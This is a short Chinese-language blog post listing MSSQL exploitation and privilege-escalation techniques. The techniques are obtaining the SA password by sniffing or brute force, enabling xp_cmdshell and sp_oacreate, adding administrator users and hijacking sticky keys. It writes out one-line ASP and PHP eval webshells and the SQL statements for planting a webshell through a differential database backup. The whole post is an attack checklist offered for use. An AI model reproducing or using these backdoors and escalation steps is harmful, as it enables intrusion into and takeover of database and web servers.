MSSQL 漏洞利用与提权

1、SA口令的获取

webshell或源代码的获取

源代码泄露

嗅探(用CAIN等工具嗅探1433数据库端口)

口令暴力破解

2、常见SQL server 提权命令

查看数据库的版本(select @@version;)

查看数据库所在服务器操作系统的参数

查看数据库启动的参数

查看数据库启动的时间

查看数据库服务器名和实例名

查看用户登录信息

查看数据库里所所有的存储工程和函数

查看数据库里用户和进程的信息

恢复存储过程

开启和关闭xp_cmdshell

xp_cmdshell执行命令

开启和关闭sp_oacreate

sp_oacreate删除文件

sp_oacreate复制文件

sp_oacreate移动文件

sp_oacreate添加管理员用户

开启和关闭sp_makeweblask\

wscript.shell执行命令

shell.applocation执行命令

开启和关闭openrowset

沙盒执行命令

注册表劫持粘贴键

sp_oacreate替换粘贴键

public提权操作

echo一句话后门(echo  <%eval request(cmd)%> >d:\wwwroot\ok.asp    echo  <? php @eval($_POST[cmd]);?> >cmd.php)

在mssql 中查询password

3、通过数据库备份获取webshell

差异备份一句话木马

backup database [当前数据库名] to disk = 'c:\recycler\1.bak'

create table cmd (a image);

insert into cmd(a) values ('<%eval request("cmd")%>');

backup database [当前数据库名] to disk = '网站绝对路径' WITH DIFFERENTIAL,FORMAT--

 

LOG 备份一句话木马(......)

 

posted @ 2018-11-24 16:45  linuxsec  阅读(3024)  评论(0编辑  收藏  举报